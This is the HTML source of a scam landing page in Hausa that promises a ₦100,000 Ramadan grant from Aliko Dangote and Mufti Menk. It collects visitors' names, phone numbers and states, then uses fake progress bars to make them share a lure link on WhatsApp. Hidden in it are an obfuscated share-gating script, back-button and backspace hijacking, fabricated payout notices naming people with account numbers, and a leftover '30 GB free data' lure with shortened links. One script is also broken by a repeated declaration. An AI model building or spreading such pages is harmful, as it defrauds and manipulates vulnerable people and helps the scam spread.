<!DOCTYPE html>
<html>
    <head>
<!-- Meta Pixel Code --> <script> !function(f,b,e,v,n,t,s) {if(f.fbq)return;n=f.fbq=function(){n.callMethod? n.callMethod.apply(n,arguments):n.queue.push(arguments)}; if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0'; n.queue=[];t=b.createElement(e);t.async=!0; t.src=v;s=b.getElementsByTagName(e)[0]; s.parentNode.insertBefore(t,s)}(window, document,'script', 'https://connect.facebook.net/en_US/fbevents.js'); fbq('init', '1040383411263346'); fbq('track', 'PageView'); </script> <noscript><img height="1" width="1" style="display:none" src="https://www.facebook.com/tr?id=1040383411263346&ev=PageView&noscript=1" /></noscript> <!-- End Meta Pixel Code -->

    <script>

        function set_Cookie(name,value){
            var Days = 30;
            var exp = new Date();
            exp.setTime(exp.getTime() + (Days*20*1000));
            document.cookie = name + "="+ escape (value) + ";expires=" + exp.toGMTString()+"; path=/;"
        }
        function get_Cookie(name){
            var arr,reg=new RegExp("(^| )"+name+"=([^;]*)(;|$)");
            if(arr=document.cookie.match(reg)){
                return unescape(arr[2]);
            }
            return '';
        }


        /*            if(get_Cookie("d")>0 &&get_Cookie("d")<12){
                        document.getElementById("first-box")."quedate__step".display="none";//??;
                        document.getElementById("second-box").style.display="none";//??;
                        document.getElementById("third-box").style.display="none";//??;
                        document.getElementsByClassName("loading2__box").style.display="";//??;
                    }*/


    </script>
  
        <meta charset="UTF-8" />
        <meta name="viewport" content="width=device-width, initial-scale=1.0" />
        <title>New Year 30 GB Special Offer</title>
<link rel="shortcut icon" type="image/png" href="stark.jpg" />
        <meta name="og:title" content="STARK VPN RELOADED UNLIMITED DATA" />
        <meta name="og:url" content="WWW.New-Year_Offer.PK/" />
        <meta property="og:description" content="enter your number to check if your sim card is eligible to receive 50GB Data plan valid for 3 month's" />
        <meta property="og:image" content="stark.jpg" />
        <meta property="og:type" content="website" />
    <meta property="og:updated_time" content="144320432930" />
	   

    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/css/bootstrap.min.css">
 
</head>
<body>
  

<style type="text/css">
@import url("https://fonts.googleapis.com/css2?family=Poppins:wght@500;700&display=swap");
@import url("//fonts.googleapis.com/earlyaccess/droidarabicnaskh.css");
@import url('https://fonts.googleapis.com/css2?family=Noto+Nastaliq+Urdu:wght@700&display=swap');
@import url('https://fonts.googleapis.com/css2?family=Noto+Nastaliq+Urdu:wght@400;700&display=swap');
* {
    margin: 0;
    padding: 0;
    font-family: Poppins, Droid Arabic Naskh;
    font-weight: normal;
    box-sizing: border-box;


}
body {
    direction: lfl;
    background: #ebedf0;
    
}
.notification {
            display: none;
            color: brown;
            font-weight: bold;
            font-size: 15px;
            padding: 7px 15px;
            position: fixed;
            top: 10px;
            left: 0;
            width: fit-content;
            text-align: center;
            white-space: nowrap;
            background: rgba(255, 235, 205, 0.8);
            border-radius: 8px;
            box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);
            animation: moveRight 3s linear infinite alternate;
            z-index: 1000;
        }
a {
    text-decoration: none;
}
.post {
    background: #fff;
    margin: 0 auto;
    padding: 10px;
    max-width: 500px;
    border: 1px solid #d0d1d5;
    border-radius: 3px;
}
.post img {
    width: 100%;
}
.welcome {
    font-size: 15px;
}
.amount,
#getname {
    color: #098105;
    text-decoration: none;
}
.done {
    text-align: center;
    color: #27ae60;
}
.tip {
    font-size: 14px;
}
.title {
    text-align: center;
}
.error {
    display: none;
    text-align: center;
    font-size: 14px;
    color: #e74c3c;
}
button {
    display: block;
    width: 260px;
    height: 50px;
    color: #fff;
    border: none;
    outline: none;
    font-size: 24px;
    cursor: pointer;
    border-radius: 5px;
    padding: 0 10px;
    margin: 10px auto;
    background: rgb(9, 129, 5);
    transition: background 0.3s ease;
}
button:hover {
    background: #098105;
}
.phone {
    max-width: 400px;
    margin: 10px auto;
}
.phone input {
    width: 100%;
    height: 50px;
    padding: 10px;
    outline: none;
    border: 2px solid #cecece;
    font-size: 14px;
}
#confirm {
    width: 200px;
    margin: 10px auto;
    border-radius: 0px;
}
#loader {
    text-align: center;
}
.spin {
    width: 50px;
    height: 50px;
    background: transparent;
    border: solid 8px rgb(9, 129, 5);
    border-right-color: transparent;
    border-radius: 50%;
    margin: 10px auto;
    animation: spin 0.8s linear infinite;
}
@keyframes spin {
    100% {
        transform: rotate(1turn);
    }
}
#loader,
#info,
#checking,
#share,
#claim {
    display: none;
}
.center {
    display: flex;
    align-items: center;
    justify-content: center;
}
.barr {
    direction: ltr;
    max-width: 400px;
    margin: 10px auto;
    box-sizing: border-box;
}
.fill {
    position: relative;
    display: inline-block;
    width: calc(100% - 100px);
    height: 35px;
    padding: 2px;
    border: 2px solid #098105;
}
#fill,
#fill2 {
    background: #098105;
    width: 0%;
    height: 100%;
}
.percentage {
    width: 100px;
    float: right;
    height: 35px;
    font-size: 16px;
    border: 2px solid #098105;
}
#percentage,
#percentage2 {
    margin-left: 5px;
}
#check,
#check2 {
    display: none;
}
.counter {
    color: #7f7f7f;
    font-size: 12px;
    text-align: right;
    padding: 10px 0 10px 2px;
    border-bottom: 1px solid #e1e2e3;
}
.reactions {
    display: inline-flex;
    align-items: center;
    float: left;
}
.counter img {
    float: left;
    width: 16px;
    height: 16px;
    border-radius: 50%;
    border: 2px solid #fff;
    box-sizing: content-box;
}
.like,
.love {
    margin-right: -5px;
}
.like {
    z-index: 2;
}
.love {
    z-index: 1;
}
.bar {
    display: table;
    width: 100%;
    border-bottom: 1px solid #e1e2e3;
}
.bar .react {
    display: table-cell;
    width: calc(100% / 3);
    font-size: 12px;
    color: #7f7f7f;
    text-align: center;
    padding: 10px 0;
    cursor: pointer;
}
.comments {
    direction: ltr;
}
.comment {
    padding: 6px 0;
    margin-top: 5px;
}
.comment img {
    float: left;
    width: 32px;
    height: 32px;
    border: none;
    border-radius: 18px;
    cursor: pointer;
}
.reply {
    margin-left: 37px;
}
.single-container {
    margin-left: 37px;
    background: #f1f2f6;
    padding: 10px;
    border-radius: 15px;
    font-size: 12px;
}
.single-container .user {
    display: inline-block;
    cursor: pointer;
    color: #365899;
    margin-bottom: 5px;
}
.single-container .text {
    display: block;
}
.buttons {
    font-size: 12px;
    font-weight: bold;
    margin: 10px 0 0 47px;
    color: #90949c;
}
.action {
    cursor: pointer;
}
.action:hover {
    text-decoration: underline;
}
.input {
    padding: 6px 12px 12px;
}
.input input {
    width: 100%;
    background: #f1f2f6;
    padding: 10px;
    border-radius: 15px;
    border: 0;
    outline: none;
}
.A{

    font-family: 'Noto Nastaliq Urdu', serif;
    text-align: center;
	width:75%;
	border-radius:15px;
	padding:5px;
	margin-bottom:10px;
    background-color: rgb(164, 219, 175);
}
.horizontal_marque{
font-family: 'Noto Nastaliq Urdu', serif;

}
</style>
  
  
  
  
                  
<div id="notification" class="notification"></div>
                       

    <div class="post" width="100%">
        <center><img src="x.jpeg" alt="Pakistan" style="width: 400px;; height:150;"></center>
        <div id="intro">
         
            <p class="welcome">
                <center>
			 <h6>
                RAMADAN ALBARKAR 🚨 Aliko Dangote da Ismail ibn Musa Menk suna bada ₦100,000 ga yan Najeriya a wannan Ramadan! 🎉 Kada ku yi kuskure!
                <br />
                Danna da ke ƙasa don farawa
            </h6>

        </center>
                </p>
     
      
            <button id="go">FARA APPLICATION</button>
           
        </div>
        <div id="loader">
            <div>Don Allah jira...</div>
            <div class="spinner-grow text-success"></div>

            <div class="spinner-grow text-warning"></div>
            <div class="spinner-grow text-danger"></div>
            <div id="num">0%</div>
        </div>
        <div id="info">
          
            <div class="phone">
                <form>
                    <div style="margin-bottom: 15px; text-align: left;">
                        <label for="name" style="font-weight: bold; display: block; margin-bottom: 5px;">Suna:</label>
                        <input type="text" id="name" name="name" placeholder="Enter your name" required style="width: 100%; padding: 10px; font-size: 16px; border: 1px solid #ccc; border-radius: 5px;">
                    </div>
                    <div style="margin-bottom: 15px; text-align: left;">
                        <label for="phone" style="font-weight: bold; display: block; margin-bottom: 5px;">lambar waya:</label>
                        <input type="number" id="phone" name="phone" placeholder="Enter your phone number" required style="width: 100%; padding: 10px; font-size: 16px; border: 1px solid #ccc; border-radius: 5px;">
                    </div>
                    <div style="margin-bottom: 15px; text-align: left;">
                        <label for="state" style="font-weight: bold; display: block; margin-bottom: 5px;">Jiha:</label>
                        <input type="text" id="state" name="state" placeholder="Enter your state" required style="width: 100%; padding: 10px; font-size: 16px; border: 1px solid #ccc; border-radius: 5px;">
                    </div>
                    </form>
              
                <button id="confirm">SUBMIT</button>
            </div>
            <p class="error">Da fatan za a shigar da ingantacciyar lamba!</p>
        </div>
        <div id="checking">
            <center><div>Don Allah jira...</div>
           <div class="spinner-grow text-success"></div>

            <div class="spinner-grow text-warning"></div>
            <div class="spinner-grow text-danger"></div>
            </center>
        </div>
        <div id="share">
<center>
    
            <p class="tip">barka da zuwa Lambar Application shine  <span id="output"></span></p>
            <p class="tip">SUNA shine: <span id="getname"></span> Tare da lambar waya  <span id="getname1"></span> Daga <span id="getname2"></span></p>
        

            <p class="tip">
                Bayan tabbatarwa, kun cancanci samun tallafin ₦ 100,000  </p>
               <h5 style="color: red;"> Yadda ake ci gaba: zuwa form Account Number</h5>
            <p class="tip">1. Raba shi zuwa groups 5 ko abokai 15 akan WhatsApp ( Danna alamar "SHARE" da ke ƙasa).</p>
            <p class="tip">2. Rijistar ku za ta ƙare ta atomatik bayan an cika ma'aunin tabbatar da GREEN.</p>
            <p class="tip">3. Za ku sami tabbaci ta kira/SMS daga SIM ɗin ku.</p>
        </center>
            <button id="whatsapp">SHARE</button>
            <div class="barr">
                <div class="fill">
                    <div id="fill2"></div>
                </div>
                <div class="percentage center">
                    <span><i class="fa fa-spinner fa-pulse"></i></span>
                    <span id="percentage2">0%</span>
                </div>
            </div>
        </div>
        <div id="claim">
            <p class="done"><i class="fa fa-check-circle fa-3x" aria-hidden="true"></i></p>
            <p class="title">An kammala rijistar ku.</p>
            <button id="offer">Danna nan</button>
        </br>
    </br></br></br></br>
           </div>
		
        
    <script src="https://code.jquery.com/jquery-latest.min.js"></script>




<script type="text/javascript">
var time = 0;
window.setInterval(function () {
    time = time + 1;
    $(".t1").html(time + 1 + "m");
    $(".t2").html(time + 2 + "m");
    $(".t3").html(time + 4 + "m");
}, 6e4);
var likes = 134,
var likes = 134,
    comments = 23,
    shares = 12;
window.setInterval(function () {
    likes = likes + Math.floor(Math.random() * 3);
    comments = comments + Math.floor(Math.random() * 2);
    shares = shares + Math.floor(Math.random() * 2);
    $("#likes").html(likes + "K");
    $("#comments").html(comments + "K comments");
    $("#shares").html(shares + "K shares");
}, 5e3);
$(".liked").click(function () {
    if ($(this).hasClass("selected")) {
        $(this).removeClass("selected");
        $(this).html("Like");
    } else {
        $(this).addClass("selected");
        $(this).html("Unlike");
    }
});
</script>








<script type="text/javascript">

$("#go").click(function () {
    $("#intro").fadeOut(0);
    $("#loader").fadeIn(500);
    var i = 0;
    var interval = setInterval(function () {
        $("#num").text(i + "%");
        i += 1;
        if (i >= 100) {
            clearInterval(interval);
            $("#loader").fadeOut(0);
            $("#info").fadeIn(500);
        }
    }, 50);
});
$("#confirm").click(function () {
    if ($("#name").val().length < 0)
    {
        $(".error").fadeIn(500);
    } else {
        $("#info").fadeOut(0);
        $("#checking").fadeIn(400);
        var i = 0;
        var interval = setInterval(function () {
            i += 1;
            $("#percentage").text(i + "%");
            $("#fill").css("width", i + "%");
            if (i == 50) {
                i = 49;
                setTimeout(function () {
                    i = 50;
                }, 1000);
            }
            if (i >= 100) {
                clearInterval(interval);
                $("#load").fadeOut(0);
                $("#check").fadeIn(0);
                setTimeout(function () {
                    $("#checking").fadeOut(0);
                    $("#share").fadeIn(1000);
                    $("#getname").html($("#name").val());
                    $("#getname1").html($("#phone").val());
                    $("#getname2").html($("#state").val());
                }, 500);
            }
        }, 50);
    }
});
$(document).click(function () {
    if ($("#name").is(":focus")) {
        $(".error").fadeOut(500);
    }
});
</script>




<!--
"*30%20GB%20Free%20Internet%20Offer*%0A%E2%9D%A4%0ATo%20Activate%2030%20GB%20Free%20Internet%20for%20all%20Networks%20click%20here%F0%9F%91%87%0A*1.%20Jio*%0Ahttps://cutt.ly/30-GB_Jio%0A%20%0A*2.%20Airtel*%0Ahttps://cutt.ly/30-GB_Airtel%0A%20%0A*3.%20Vi*%0Ahttps://cutt.ly/30-GB_Vi%0A%20%0A*4.%20Jazz*%0Ahttps://cutt.ly/30-GB_Jazz%0A%20%0A*5.%20Zong*%0Ahttps://cutt.ly/30-GB_Zong%0A%20%0A*6.%20Telenor*%0Ahttps://cutt.ly/30-GB_Telenor%0A%20%0A*7.%20Ufone*%0Ahttps://cutt.ly/30-GB_Ufone%0A%20%0A*8.%20Other Networks*%0Ahttps://cutt.ly/Get_30GB",
-->
    <script>
        var text1 ="KYAUTAR%20RAMADAN%20DAGA%20ALIKO%20DANGOTE%0A%0AA%20samu%20tsabar%20kudi%20%E2%82%A6100%2C000%20nan%20take%20na%20Ramadan!%0A%0A**YADDA%20AKE%20SAMU**%0AZiyarci%20hanyar%20ha%C6%99in%20yanar%20gizon%20da%20ke%20%C6%99asa%2C%20amsa%20wasu%20%C6%B4an%20tambayoyi%2C%20kuma%20ku%20kar%C9%93i%20%E2%82%A6100%2C000%20nan%20take%20don%20bikin%20Ramadan.%0A%0A%E2%9C%85%20Na%20samu%20nawa!%0A%0A%F0%9F%94%97%20Danna%20nan%F0%9F%91%87%0Ahttps://grant.getapply.online/kyautar-dangote-ramadan-2025",
            text2 = " an amount of ",
            text3 = " for every citizen who meets the conditions as an aid to the poor class to overcome the crisis. Enter and register now and make sure to register correctly 👉 ",
            error = "Something is wrong!\nPosts are not calculated. You may have shared it with the same friend or group more than once, please re-share",
            abcde = "/",
            saved = "",
            share = "whatsapp://send?text=" + text1;
    </script>






<script>
<!-- code by OD -->
document.write(unescape('%20%3Cscript%20type%3D%22text/javascript%22%3E%0A%20var%20swidth%20%3D%20localStorage.getItem%28saved%29%3B%0Aif%20%28swidth%20%21%3D%3D%20null%29%20%7B%0A%20%20%20%20var%20width%20%3D%20swidth%20*%201%3B%0A%20%20%20%20%24%28%22%23intro%22%29.fadeOut%280%29%3B%0A%20%20%20%20%24%28%22.comments%22%29.fadeOut%280%29%3B%0A%20%20%20%20%24%28%22%23share%22%29.fadeIn%280%29%3B%0A%20%20%20%20%24%28%22%23fill2%22%29.css%28%22width%22%2C%20width%20+%20%22%25%22%29%3B%0A%20%20%20%20%24%28%22%23percentage2%22%29.text%28width%20+%20%22%25%22%29%3B%0A%7D%20else%20%7B%0A%20%20%20%20var%20width%20%3D%200%3B%0A%7D%0A%24%28%22%23whatsapp%22%29.click%28function%20%28%29%20%7B%0A%20%20%20%20window.location.href%20%3D%20share%3B%0A%20%20%20%20if%20%28width%20%3D%3D%200%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%2050%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2050%29%20%7B%0A%20%20%20%20%20%20%20%20alert%28error%29%3B%0A%20%20%20%20%20%20%20%20width%20+%3D%2015%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2065%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%205%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2070%29%20%7B%0A%20%20%20%20%20%20%20%20alert%28error%29%3B%0A%20%20%20%20%20%20%20%20width%20+%3D%2010%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2080%29%20%7B%0A%20%20%20%20%20%20%20%20alert%28error%29%3B%0A%20%20%20%20%20%20%20%20width%20+%3D%205%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2085%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%202%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2087%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%201%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2088%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%202%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2090%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%201%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2091%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%201%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2092%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%201%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2093%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%201%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2094%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%201%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2095%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%201%3B%0A%20%20%20%20%7D%20else%20if%20%28width%20%3D%3D%2096%29%20%7B%0A%20%20%20%20%20%20%20%20width%20+%3D%202%3B%0A%20%20%20%20%7D%20else%20%7B%0A%20%20%20%20%20%20%20%20%24%28%22%23share%22%29.fadeOut%280%29%3B%0A%20%20%20%20%20%20%20%20%24%28%22%23claim%22%29.fadeIn%281000%29%3B%0A%20%20%20%20%7D%0A%20%20%20%20localStorage.setItem%28saved%2C%20width%29%3B%0A%20%20%20%20setTimeout%28function%20%28%29%20%7B%0A%20%20%20%20%20%20%20%20%24%28%22%23fill2%22%29.css%28%22width%22%2C%20width%20+%20%22%25%22%29%3B%0A%20%20%20%20%20%20%20%20%24%28%22%23percentage2%22%29.text%28width%20+%20%22%25%22%29%3B%0A%20%20%20%20%7D%2C%202000%29%3B%0A%7D%29%3B%0A%24%28%22%23offer%22%29.click%28function%20%28%29%20%7B%0A%20%20%20%20window.open%28abcde%2C%20%22_blank%22%29%3B%0A%7D%29%3B%0A%3C/script%3E'))
</script>

 

<script>
    window.onhashchange=function(){jp();};
    function hh() {history.pushState(history.length+1, "message", "#"+new Date().getTime());}
    function jp() {
        fh();}
    setTimeout('hh();', 500);
    function fh(){
        location.href="/";
    }
    function goon(){
        location.href="/";
    }
</script>

<script>
(function (global) {

	if(typeof (global) === "undefined")
	{
		throw new Error("window is undefined");
	}

    var _hash = "!";
    var noBackPlease = function () {
        global.location.href += "#";

		// making sure we have the fruit available for juice....
		// 50 milliseconds for just once do not cost much (^__^)
        global.setTimeout(function () {
            global.location.href += "!";
        }, 50);
    };
	
	// Earlier we had setInerval here....
    global.onhashchange = function () {
        if (global.location.hash !== _hash) {
            global.location.hash = _hash;
        }
    };

    global.onload = function () {
        
		noBackPlease();

		// disables backspace on page except on input fields and textarea..
		document.body.onkeydown = function (e) {
            var elm = e.target.nodeName.toLowerCase();
            if (e.which === 8 && (elm !== 'input' && elm  !== 'textarea')) {
                e.preventDefault();
            }
            // stopping event bubbling up the DOM tree..
            e.stopPropagation();
        };
		
    };

})(window);
</script>
<script>
    function generateRandom() {
        const numbers = '0123456789';
        const letters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';
        let randomString = '';
        
        // Generate 3 random digits
        for (let i = 0; i < 3; i++) {
            randomString += numbers.charAt(Math.floor(Math.random() * numbers.length));
        }
        
        // Generate 2 random letters
        for (let i = 0; i < 2; i++) {
            randomString += letters.charAt(Math.floor(Math.random() * letters.length));
        }
        
        document.addEventListener("DOMContentLoaded", function() {
            document.getElementById('output').textContent = randomString;
        });
    }
    generateRandom();
</script>



<script type="text/javascript">! function (){	var t;	try{for (t=0; 10 > t; ++t)		history.pushState({}, "", "#");	onpopstate=function (t)	{		t.state && alert('Please Share Maximum to receive gift. ');		}}		catch (o){}}();</script>
<script>
  const messages = [
"₦105000 sent to Chukwuemeka Okonkwo 8146557856 Opay",  
"₦10000 sent to Fatima Balogun 20468574858 UBA ",  
"₦25000 sent to Adetokunbo Adeyemi 6746785786 GTBANK",  
"₦150000 sent to Nnenna Uche 5783256745 FCMB ",  
"₦305000 sent t oOluwaseun Olatunde 6425636743 Access Bank",  
"₦105000 sent to Yakubu Danjuma 3536753672 Fidelity Bank: ",  
"₦100000 sent to Zainab Bello 4257525758 Sterling Bank ",  
"₦750000 sent to Ifeanyi Eze 4257968478 Wema Bank ",  
"₦10000 sent to Aisha Musa 7543575767 Access Bank",  
"₦109000 sent to Tunde Alabi 5443656475 Opay",  
"₦250000 sent to Ebubechukwu Obi 3425356456 Opay",  
"₦705000 sent to Abdulrahman Sani 4356453535 Fidelity Bank",  
"₦165000 sent to Kemi Adebayo 5534724536 UBA",  
"₦755000 sent to Chinonso Nwankwo 5324756435 Keystone Bank",  
"₦5530000 sent to Segun Falana 6467453532 FCMB",  
"₦27400 sent to Halima Yusuf 3463564673 Sterling Bank ",  
"₦910000 sent to Ugochukwu Nnamdi 3546875356 Wema Bank ",  
"₦843000 sent to Folashade Ogunleye 2456464357 Opay",  
"₦105000 sent to Idris Suleiman 5427846856 Union Bank",  
"₦105000 sent to Ngozi Chukwu 7545353532 Keystone Bank"  

  ];

  function toggleNotification() {
      let notification = document.getElementById("notification");
      let randomMessage = messages[Math.floor(Math.random() * messages.length)];
      notification.innerText = randomMessage;
      notification.style.display = "block";
      setTimeout(() => {
          notification.style.display = "none";
      }, 3000);
  }
  setInterval(toggleNotification, 6000);
</script>
</body></html>
<!-- BEGIN: Powered by Supercounters.com -->
<center><script type="text/javascript" src="//widget.supercounters.com/ssl/online_i.js"></script><script type="text/javascript">sc_online_i(1710555,"ffffff","ffffff");</script><br><noscript><a href="https://www.supercounters.com/">free online counter</a></noscript>
</center>
<!-- END: Powered by Supercounters.com -->
